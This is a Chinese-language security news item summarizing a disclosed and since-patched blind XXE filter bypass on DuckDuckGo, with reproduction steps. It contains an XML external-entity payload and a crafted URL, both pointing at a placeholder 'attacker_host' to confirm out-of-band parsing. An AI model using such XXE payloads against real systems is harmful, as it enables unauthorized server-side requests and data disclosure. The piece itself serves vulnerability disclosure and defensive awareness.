近期,白帽匯安全研究院發現HackerOne網站公開了一個DuckDuckGo網站的XXE漏洞。該漏洞是以前一個DuckDuckGo網站XXE漏洞的新繞過方法,兩個漏洞的發現者為同一個人。(上個XXE漏洞說明:https://nosec.org/home/detail/2219.html)

DuckDuckGo強調在傳統搜尋引擎的基礎上引入各大Web 2.0站點的內容。其辦站哲學主張維護使用者的隱私權,並承諾不監控、不記錄使用者的搜尋內容。

——來自百度百科

以下為漏洞具體說明:

復現步驟

  1. 首先攻擊者在自己的外網伺服器上搭建web服務,並且放上一個文件內容如下的XXE攻擊文件(xml文件):

<?xm l version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://attacker_host/Blind_xxe"> %ext;
]>
<r></r>

  1. 攻擊者在瀏覽器上訪問 https://duckduckgo.com/x.js?u=http://attacker_host/xxe.xml,其中http://attacker_host/xxe.xml代表上一步的XXE攻擊文件:
  2. 最後,攻擊者可在自己的伺服器上檢測到attacker_host/Blind_xxe被訪問,這說明攻擊者的xm l文件成功被DuckDuckGo解析。

最後,發現者還表示,不僅duckduckgo.com存在這個問題,api.duckduckgo.com網站也存在這個問題。

隨後,DuckDuckGo安全團隊表示漏洞已再次修復,請幫忙檢查。發現者在複查後,表示雖不知道後端防護邏輯,但漏洞已成功修復。不過,發現者同時表示,XXE漏洞的防護不能只檢查文件引用源頭,還要檢查文件的內容。

本文由白帽彙整理並翻譯,不代表白帽匯任何觀點和立場

來源:DuckDuckGo上Blind XXE漏洞防護繞過

原文:hackerone.com/reports/4

白帽匯從事信息安全,專註於安全大數據、企業威脅情報。

公司產品:FOFA-網路空間安全搜索引擎、FOEYE-網路空間檢索系統、NOSEC-安全訊息平台。

為您提供:網路空間測繪、企業資產收集、企業威脅情報、應急響應服務。

推薦閱讀:

相关文章